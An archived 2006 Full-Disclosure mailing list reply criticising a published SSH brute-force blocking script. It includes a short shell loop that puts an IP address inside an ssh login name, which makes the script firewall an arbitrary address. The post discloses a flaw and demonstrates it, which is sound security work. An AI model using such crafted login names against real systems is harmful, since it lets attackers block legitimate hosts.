lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Tue Feb 28 21:53:00 2006
From: tastytastybeef at googlemail.com (Gary Leons)
Subject: reduction of brute force login attempts via SSH
	through iptables --hashlimit

On 2/28/06, GroundZero Security <fd@....org> wrote:
> Hello,
>
> i made a small bash script last year to block those bruteforce attempts automatically via the firewall.
> In case someone is interested, i released it on our website. Someone may have a use for it :-)
> http://www.groundzero-security.com/code/bruteforce-block.sh
> Have a nice day everyone!
>
> -sk

That is remarkably shoddy coding from a "security research and
software developer".

*NEWS FLASH* most platforms allow login names to contain spaces.

$ for ((i=0;i<5;i++));
>  do ssh -l "j00 ar3 l4m3 222.173.190.239" idiot.running.this.script.com
>  done

And i just added an arbitrary address to your firewall, fun!

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ